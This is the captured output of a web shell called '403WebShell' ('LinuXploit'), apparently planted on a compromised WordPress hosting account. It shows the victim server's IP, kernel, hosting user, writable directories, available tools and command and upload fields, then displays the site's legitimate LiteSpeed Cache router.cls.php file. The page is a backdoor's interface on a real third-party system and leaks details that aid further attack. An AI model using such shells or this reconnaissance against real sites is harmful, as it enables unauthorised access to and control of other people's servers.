Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.217.241.235
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/wp-content/plugins/litespeed-cache/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/wp-content/plugins/litespeed-cache/src//router.cls.php
<?php

/**
 * The core plugin router class.
 *
 * This generate the valid action.
 *
 * @since      	1.1.0
 * @since  		1.5 Moved into /inc
 */

namespace LiteSpeed;

defined('WPINC') || exit();

class Router extends Base
{
	const LOG_TAG = '[Router]';

	const NONCE = 'LSCWP_NONCE';
	const ACTION = 'LSCWP_CTRL';

	const ACTION_SAVE_SETTINGS_NETWORK = 'save-settings-network';
	const ACTION_DB_OPTM = 'db_optm';
	const ACTION_PLACEHOLDER = 'placeholder';
	const ACTION_AVATAR = 'avatar';
	const ACTION_SAVE_SETTINGS = 'save-settings';
	const ACTION_CLOUD = 'cloud';
	const ACTION_CDN_SETUP = 'cdn_setup';
	const ACTION_IMG_OPTM = 'img_optm';
	const ACTION_HEALTH = 'health';
	const ACTION_CRAWLER = 'crawler';
	const ACTION_PURGE = 'purge';
	const ACTION_CONF = 'conf';
	const ACTION_ACTIVATION = 'activation';
	const ACTION_CSS = 'css';
	const ACTION_UCSS = 'ucss';
	const ACTION_VPI = 'vpi';
	const ACTION_PRESET = 'preset';
	const ACTION_IMPORT = 'import';
	const ACTION_REPORT = 'report';
	const ACTION_DEBUG2 = 'debug2';
	const ACTION_CDN_CLOUDFLARE = 'CDN\Cloudflare';

	// List all handlers here
	private static $_HANDLERS = array(
		self::ACTION_ACTIVATION,
		self::ACTION_AVATAR,
		self::ACTION_CDN_CLOUDFLARE,
		self::ACTION_CLOUD,
		self::ACTION_CDN_SETUP,
		self::ACTION_CONF,
		self::ACTION_CRAWLER,
		self::ACTION_CSS,
		self::ACTION_UCSS,
		self::ACTION_VPI,
		self::ACTION_DB_OPTM,
		self::ACTION_DEBUG2,
		self::ACTION_HEALTH,
		self::ACTION_IMG_OPTM,
		self::ACTION_PRESET,
		self::ACTION_IMPORT,
		self::ACTION_PLACEHOLDER,
		self::ACTION_PURGE,
		self::ACTION_REPORT,
	);

	const TYPE = 'litespeed_type';

	const ITEM_HASH = 'hash';
	const ITEM_FLASH_HASH = 'flash_hash';

	private static $_esi_enabled;
	private static $_is_ajax;
	private static $_is_logged_in;
	private static $_ip;
	private static $_action;
	private static $_is_admin_ip;
	private static $_frontend_path;

	/**
	 * Redirect to self to continue operation
	 *
	 * Note: must return when use this func. CLI/Cron call won't die in this func.
	 *
	 * @since  3.0
	 * @access public
	 */
	public static function self_redirect($action, $type)
	{
		if (defined('LITESPEED_CLI') || defined('DOING_CRON')) {
			Admin_Display::succeed('To be continued'); // Show for CLI
			return;
		}

		// Add i to avoid browser too many redirected warning
		$i = !empty($_GET['litespeed_i']) ? $_GET['litespeed_i'] : 0;
		$i++;

		$link = Utility::build_url($action, $type, false, null, array('litespeed_i' => $i));

		$url = html_entity_decode($link);
		exit("<meta http-equiv='refresh' content='0;url=$url'>");
	}

	/**
	 * Check if can run optimize
	 *
	 * @since  1.3
	 * @since  2.3.1 Relocated from cdn.cls
	 * @access public
	 */
	public function can_optm()
	{
		$can = true;

		if (is_user_logged_in() && $this->conf(self::O_OPTM_GUEST_ONLY)) {
			$can = false;
		} elseif (is_admin()) {
			$can = false;
		} elseif (is_feed()) {
			$can = false;
		} elseif (is_preview()) {
			$can = false;
		} elseif (self::is_ajax()) {
			$can = false;
		}

		if (self::_is_login_page()) {
			Debug2::debug('[Router] Optm bypassed: login/reg page');
			$can = false;
		}

		$can_final = apply_filters('litespeed_can_optm', $can);

		if ($can_final != $can) {
			Debug2::debug('[Router] Optm bypassed: filter');
		}

		return $can_final;
	}

	/**
	 * Check referer page to see if its from admin
	 *
	 * @since 2.4.2.1
	 * @access public
	 */
	public static function from_admin()
	{
		return !empty($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], get_admin_url()) === 0;
	}

	/**
	 * Check if it can use CDN replacement
	 *
	 * @since  1.2.3
	 * @since  2.3.1 Relocated from cdn.cls
	 * @access public
	 */
	public static function can_cdn()
	{
		$can = true;

		if (is_admin()) {
			if (!self::is_ajax()) {
				Debug2::debug2('[Router] CDN bypassed: is not ajax call');
				$can = false;
			}

			if (self::from_admin()) {
				Debug2::debug2('[Router] CDN bypassed: ajax call from admin');
				$can = false;
			}
		} elseif (is_feed()) {
			$can = false;
		} elseif (is_preview()) {
			$can = false;
		}

		/**
		 * Bypass cron to avoid deregister jq notice `Do not deregister the <code>jquery-core</code> script in the administration area.`
		 * @since  2.7.2
		 */
		if (defined('DOING_CRON')) {
			$can = false;
		}

		/**
		 * Bypass login/reg page
		 * @since  1.6
		 */
		if (self::_is_login_page()) {
			Debug2::debug('[Router] CDN bypassed: login/reg page');
			$can = false;
		}

		/**
		 * Bypass post/page link setting
		 * @since 2.9.8.5
		 */
		$rest_prefix = function_exists('rest_get_url_prefix') ? rest_get_url_prefix() : apply_filters('rest_url_prefix', 'wp-json');
		if (
			!empty($_SERVER['REQUEST_URI']) &&
			strpos($_SERVER['REQUEST_URI'], $rest_prefix . '/wp/v2/media') !== false &&
			isset($_SERVER['HTTP_REFERER']) &&
			strpos($_SERVER['HTTP_REFERER'], 'wp-admin') !== false
		) {
			Debug2::debug('[Router] CDN bypassed: wp-json on admin page');
			$can = false;
		}

		$can_final = apply_filters('litespeed_can_cdn', $can);

		if ($can_final != $can) {
			Debug2::debug('[Router] CDN bypassed: filter');
		}

		return $can_final;
	}

	/**
	 * Check if is login page or not
	 *
	 * @since  2.3.1
	 * @access protected
	 */
	protected static function _is_login_page()
	{
		if (in_array($GLOBALS['pagenow'], array('wp-login.php', 'wp-register.php'), true)) {
			return true;
		}

		return false;
	}

	/**
	 * UCSS/Crawler role simulator
	 *
	 * @since  1.9.1
	 * @since  3.3 Renamed from `is_crawler_role_simulation`
	 */
	public function is_role_simulation()
	{
		if (is_admin()) {
			return;
		}

		if (empty($_COOKIE['litespeed_hash']) && empty($_COOKIE['litespeed_flash_hash'])) {
			return;
		}

		self::debug('starting role validation');

		// Check if is from crawler
		// if ( empty( $_SERVER[ 'HTTP_USER_AGENT' ] ) || strpos( $_SERVER[ 'HTTP_USER_AGENT' ], Crawler::FAST_USER_AGENT ) !== 0 ) {
		// 	Debug2::debug( '[Router] user agent not match' );
		// 	return;
		// }

		// Flash hash validation
		if (!empty($_COOKIE['litespeed_flash_hash'])) {
			$hash_data = self::get_option(self::ITEM_FLASH_HASH, array());
			if ($hash_data && is_array($hash_data) && !empty($hash_data['hash']) && !empty($hash_data['ts']) && !empty($hash_data['uid'])) {
				if (time() - $hash_data['ts'] < 120 && $_COOKIE['litespeed_flash_hash'] == $hash_data['hash']) {
					self::debug('role simulate uid ' . $hash_data['uid']);
					self::delete_option(self::ITEM_FLASH_HASH);
					wp_set_current_user($hash_data['uid']);
					return;
				}
			}
		}
		// Hash validation
		// if (!empty($_COOKIE['litespeed_hash'])) {
		// 	$hash_data = self::get_option(self::ITEM_HASH, array());
		// 	if ($hash_data && is_array($hash_data) && !empty($hash_data['hash']) && !empty($hash_data['ts']) && !empty($hash_data['uid'])) {
		// 		if (time() - $hash_data['ts'] < $this->conf(Base::O_CRAWLER_RUN_DURATION) && $_COOKIE['litespeed_hash'] == $hash_data['hash']) {
		// 			if (empty($hash_data['ip'])) {
		// 				$hash_data['ip'] = self::get_ip();
		// 				self::update_option(self::ITEM_HASH, $hash_data);
		// 			} else {
		// 				$server_ips = apply_filters('litespeed_server_ips', array($hash_data['ip']));
		// 				if (!self::ip_access($server_ips)) {
		// 					self::debug('WARNING: role simulator ip check failed [db ip] ' . $hash_data['ip'], $server_ips);
		// 					return;
		// 				}
		// 			}
		// 			wp_set_current_user($hash_data['uid']);
		// 			return;
		// 		}
		// 	}
		// }

		self::debug('WARNING: role simulator hash not match');
	}

	/**
	 * Get a short ttl hash (2mins)
	 *
	 * @since  6.4
	 */
	public function get_flash_hash($uid)
	{
		$hash_data = self::get_option(self::ITEM_FLASH_HASH, array());
		if ($hash_data && is_array($hash_data) && !empty($hash_data['hash']) && !empty($hash_data['ts'])) {
			if (time() - $hash_data['ts'] < 60) {
				return $hash_data['hash'];
			}
		}

		$hash = Str::rrand(32);
		self::update_option(self::ITEM_FLASH_HASH, array('hash' => $hash, 'ts' => time(), 'uid' => $uid));
		return $hash;
	}

	/**
	 * Get a security hash
	 *
	 * @since  3.3
	 */
	public function get_hash($uid)
	{
		// As this is called only when starting crawling, not per page, no need to reuse
		$hash = Str::rrand(32);
		self::update_option(self::ITEM_HASH, array('hash' => $hash, 'ts' => time(), 'uid' => $uid));
		return $hash;
	}

	/**
	 * Get user role
	 *
	 * @since  1.6.2
	 */
	public static function get_role($uid = null)
	{
		if (defined('LITESPEED_WP_ROLE')) {
			return LITESPEED_WP_ROLE;
		}

		if ($uid === null) {
			$uid = get_current_user_id();
		}

		$role = false;
		if ($uid) {
			$user = get_userdata($uid);
			if (isset($user->roles) && is_array($user->roles)) {
				$tmp = array_values($user->roles);
				$role = implode(',', $tmp); // Combine for PHP5.3 const comaptibility
			}
		}
		Debug2::debug('[Router] get_role: ' . $role);

		if (!$role) {
			return $role;
			// Guest user
			Debug2::debug('[Router] role: guest');

			/**
			 * Fix double login issue
			 * The previous user init refactoring didn't fix this bcos this is in login process and the user role could change
			 * @see  https://github.com/litespeedtech/lscache_wp/commit/69e7bc71d0de5cd58961bae953380b581abdc088
			 * @since  2.9.8 Won't assign const if in login process
			 */
			if (substr_compare(wp_login_url(), $GLOBALS['pagenow'], -strlen($GLOBALS['pagenow'])) === 0) {
				return $role;
			}
		}

		define('LITESPEED_WP_ROLE', $role);

		return LITESPEED_WP_ROLE;
	}

	/**
	 * Get frontend path
	 *
	 * @since 1.2.2
	 * @access public
	 * @return boolean
	 */
	public static function frontend_path()
	{
		//todo: move to htaccess.cls ?
		if (!isset(self::$_frontend_path)) {
			$frontend = rtrim(ABSPATH, '/'); // /home/user/public_html/frontend
			// get home path failed. Trac ticket #37668 (e.g. frontend:/blog backend:/wordpress)
			if (!$frontend) {
				Debug2::debug('[Router] No ABSPATH, generating from home option');
				$frontend = parse_url(get_option('home'));
				$frontend = !empty($frontend['path']) ? $frontend['path'] : '';
				$frontend = $_SERVER['DOCUMENT_ROOT'] . $frontend;
			}
			$frontend = realpath($frontend);

			self::$_frontend_path = $frontend;
		}
		return self::$_frontend_path;
	}

	/**
	 * Check if ESI is enabled or not
	 *
	 * @since 1.2.0
	 * @access public
	 * @return boolean
	 */
	public function esi_enabled()
	{
		if (!isset(self::$_esi_enabled)) {
			self::$_esi_enabled = defined('LITESPEED_ON') && $this->conf(self::O_ESI);
			if (!empty($_REQUEST[self::ACTION])) {
				self::$_esi_enabled = false;
			}
		}
		return self::$_esi_enabled;
	}

	/**
	 * Check if crawler is enabled on server level
	 *
	 * @since 1.1.1
	 * @access public
	 */
	public static function can_crawl()
	{
		if (isset($_SERVER['X-LSCACHE']) && strpos($_SERVER['X-LSCACHE'], 'crawler') === false) {
			return false;
		}

		// CLI will bypass this check as crawler library can always do the 428 check
		if (defined('LITESPEED_CLI')) {
			return true;
		}

		return true;
	}

	/**
	 * Check action
	 *
	 * @since 1.1.0
	 * @access public
	 * @return string
	 */
	public static function get_action()
	{
		if (!isset(self::$_action)) {
			self::$_action = false;
			self::cls()->verify_action();
			if (self::$_action) {
				defined('LSCWP_LOG') && Debug2::debug('[Router] LSCWP_CTRL verified: ' . var_export(self::$_action, true));
			}
		}
		return self::$_action;
	}

	/**
	 * Check if is logged in
	 *
	 * @since 1.1.3
	 * @access public
	 * @return boolean
	 */
	public static function is_logged_in()
	{
		if (!isset(self::$_is_logged_in)) {
			self::$_is_logged_in = is_user_logged_in();
		}
		return self::$_is_logged_in;
	}

	/**
	 * Check if is ajax call
	 *
	 * @since 1.1.0
	 * @access public
	 * @return boolean
	 */
	public static function is_ajax()
	{
		if (!isset(self::$_is_ajax)) {
			self::$_is_ajax = defined('DOING_AJAX') && DOING_AJAX;
		}
		return self::$_is_ajax;
	}

	/**
	 * Check if is admin ip
	 *
	 * @since 1.1.0
	 * @access public
	 * @return boolean
	 */
	public function is_admin_ip()
	{
		if (!isset(self::$_is_admin_ip)) {
			$ips = $this->conf(self::O_DEBUG_IPS);

			self::$_is_admin_ip = $this->ip_access($ips);
		}
		return self::$_is_admin_ip;
	}

	/**
	 * Get type value
	 *
	 * @since 1.6
	 * @access public
	 */
	public static function verify_type()
	{
		if (empty($_REQUEST[self::TYPE])) {
			Debug2::debug('[Router] no type', 2);
			return false;
		}

		Debug2::debug('[Router] parsed type: ' . $_REQUEST[self::TYPE], 2);

		return $_REQUEST[self::TYPE];
	}

	/**
	 * Check privilege and nonce for the action
	 *
	 * @since 1.1.0
	 * @access private
	 */
	private function verify_action()
	{
		if (empty($_REQUEST[Router::ACTION])) {
			Debug2::debug2('[Router] LSCWP_CTRL bypassed empty');
			return;
		}

		$action = stripslashes($_REQUEST[Router::ACTION]);

		if (!$action) {
			return;
		}

		$_is_public_action = false;

		// Each action must have a valid nonce unless its from admin ip and is public action
		// Validate requests nonce (from admin logged in page or cli)
		if (!$this->verify_nonce($action)) {
			// check if it is from admin ip
			if (!$this->is_admin_ip()) {
				Debug2::debug('[Router] LSCWP_CTRL query string - did not match admin IP: ' . $action);
				return;
			}

			// check if it is public action
			if (
				!in_array($action, array(
					Core::ACTION_QS_NOCACHE,
					Core::ACTION_QS_PURGE,
					Core::ACTION_QS_PURGE_SINGLE,
					Core::ACTION_QS_SHOW_HEADERS,
					Core::ACTION_QS_PURGE_ALL,
					Core::ACTION_QS_PURGE_EMPTYCACHE,
				))
			) {
				Debug2::debug('[Router] LSCWP_CTRL query string - did not match admin IP Actions: ' . $action);
				return;
			}

			if (apply_filters('litespeed_qs_forbidden', false)) {
				Debug2::debug('[Router] LSCWP_CTRL forbidden by hook litespeed_qs_forbidden');
				return;
			}

			$_is_public_action = true;
		}

		/* Now it is a valid action, lets log and check the permission */
		Debug2::debug('[Router] LSCWP_CTRL: ' . $action);

		// OK, as we want to do something magic, lets check if its allowed
		$_is_multisite = is_multisite();
		$_is_network_admin = $_is_multisite && is_network_admin();
		$_can_network_option = $_is_network_admin && current_user_can('manage_network_options');
		$_can_option = current_user_can('manage_options');

		switch ($action) {
			case self::ACTION_SAVE_SETTINGS_NETWORK: // Save network settings
				if ($_can_network_option) {
					self::$_action = $action;
				}
				return;

			case Core::ACTION_PURGE_BY:
				if (defined('LITESPEED_ON') && ($_can_network_option || $_can_option || self::is_ajax())) {
					//here may need more security
					self::$_action = $action;
				}
				return;

			case self::ACTION_DB_OPTM:
				if ($_can_network_option || $_can_option) {
					self::$_action = $action;
				}
				return;

			case Core::ACTION_PURGE_EMPTYCACHE: // todo: moved to purge.cls type action
				if ((defined('LITESPEED_ON') || $_is_network_admin) && ($_can_network_option || (!$_is_multisite && $_can_option))) {
					self::$_action = $action;
				}
				return;

			case Core::ACTION_QS_NOCACHE:
			case Core::ACTION_QS_PURGE:
			case Core::ACTION_QS_PURGE_SINGLE:
			case Core::ACTION_QS_SHOW_HEADERS:
			case Core::ACTION_QS_PURGE_ALL:
			case Core::ACTION_QS_PURGE_EMPTYCACHE:
				if (defined('LITESPEED_ON') && ($_is_public_action || self::is_ajax())) {
					self::$_action = $action;
				}
				return;

			case self::ACTION_PLACEHOLDER:
			case self::ACTION_AVATAR:
			case self::ACTION_IMG_OPTM:
			case self::ACTION_CLOUD:
			case self::ACTION_CDN_SETUP:
			case self::ACTION_CDN_CLOUDFLARE:
			case self::ACTION_CRAWLER:
			case self::ACTION_PRESET:
			case self::ACTION_IMPORT:
			case self::ACTION_REPORT:
			case self::ACTION_CSS:
			case self::ACTION_UCSS:
			case self::ACTION_VPI:
			case self::ACTION_CONF:
			case self::ACTION_ACTIVATION:
			case self::ACTION_HEALTH:
			case self::ACTION_SAVE_SETTINGS: // Save settings
				if ($_can_option && !$_is_network_admin) {
					self::$_action = $action;
				}
				return;

			case self::ACTION_PURGE:
			case self::ACTION_DEBUG2:
				if ($_can_network_option || $_can_option) {
					self::$_action = $action;
				}
				return;

			case Core::ACTION_DISMISS:
				/**
				 * Non ajax call can dismiss too
				 * @since  2.9
				 */
				// if ( self::is_ajax() ) {
				self::$_action = $action;
				// }
				return;

			default:
				Debug2::debug('[Router] LSCWP_CTRL match failed: ' . $action);
				return;
		}
	}

	/**
	 * Verify nonce
	 *
	 * @since 1.1.0
	 * @access public
	 * @param  string $action
	 * @return bool
	 */
	public function verify_nonce($action)
	{
		if (!isset($_REQUEST[Router::NONCE]) || !wp_verify_nonce($_REQUEST[Router::NONCE], $action)) {
			return false;
		} else {
			return true;
		}
	}

	/**
	 * Check if the ip is in the range
	 *
	 * @since 1.1.0
	 * @access public
	 */
	public function ip_access($ip_list)
	{
		if (!$ip_list) {
			return false;
		}
		if (!isset(self::$_ip)) {
			self::$_ip = self::get_ip();
		}

		if (!self::$_ip) {
			return false;
		}
		// $uip = explode('.', $_ip);
		// if(empty($uip) || count($uip) != 4) Return false;
		// foreach($ip_list as $key => $ip) $ip_list[$key] = explode('.', trim($ip));
		// foreach($ip_list as $key => $ip) {
		// 	if(count($ip) != 4) continue;
		// 	for($i = 0; $i <= 3; $i++) if($ip[$i] == '*') $ip_list[$key][$i] = $uip[$i];
		// }
		return in_array(self::$_ip, $ip_list);
	}

	/**
	 * Get client ip
	 *
	 * @since 1.1.0
	 * @since  1.6.5 changed to public
	 * @access public
	 * @return string
	 */
	public static function get_ip()
	{
		$_ip = '';
		// if ( function_exists( 'apache_request_headers' ) ) {
		// 	$apache_headers = apache_request_headers();
		// 	$_ip = ! empty( $apache_headers['True-Client-IP'] ) ? $apache_headers['True-Client-IP'] : false;
		// 	if ( ! $_ip ) {
		// 		$_ip = ! empty( $apache_headers['X-Forwarded-For'] ) ? $apache_headers['X-Forwarded-For'] : false;
		// 		$_ip = explode( ',', $_ip );
		// 		$_ip = $_ip[ 0 ];
		// 	}

		// }

		if (!$_ip) {
			$_ip = !empty($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : false;
		}
		return $_ip;
	}

	/**
	 * Check if opcode cache is enabled
	 *
	 * @since  1.8.2
	 * @access public
	 */
	public static function opcache_enabled()
	{
		return function_exists('opcache_reset') && ini_get('opcache.enable');
	}

	/**
	 * Handle static files
	 *
	 * @since  3.0
	 */
	public function serve_static()
	{
		if (!empty($_SERVER['SCRIPT_URI'])) {
			if (strpos($_SERVER['SCRIPT_URI'], LITESPEED_STATIC_URL . '/') !== 0) {
				return;
			}
			$path = substr($_SERVER['SCRIPT_URI'], strlen(LITESPEED_STATIC_URL . '/'));
		} elseif (!empty($_SERVER['REQUEST_URI'])) {
			$static_path = parse_url(LITESPEED_STATIC_URL, PHP_URL_PATH) . '/';
			if (strpos($_SERVER['REQUEST_URI'], $static_path) !== 0) {
				return;
			}
			$path = substr(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), strlen($static_path));
		} else {
			return;
		}

		$path = explode('/', $path, 2);

		if (empty($path[0]) || empty($path[1])) {
			return;
		}

		switch ($path[0]) {
			case 'avatar':
				$this->cls('Avatar')->serve_static($path[1]);
				break;

			case 'localres':
				$this->cls('Localization')->serve_static($path[1]);
				break;

			default:
				break;
		}
	}

	/**
	 * Handle all request actions from main cls
	 *
	 * This is different than other handlers
	 *
	 * @since  3.0
	 * @access public
	 */
	public function handler($cls)
	{
		if (!in_array($cls, self::$_HANDLERS)) {
			return;
		}

		return $this->cls($cls)->handler();
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit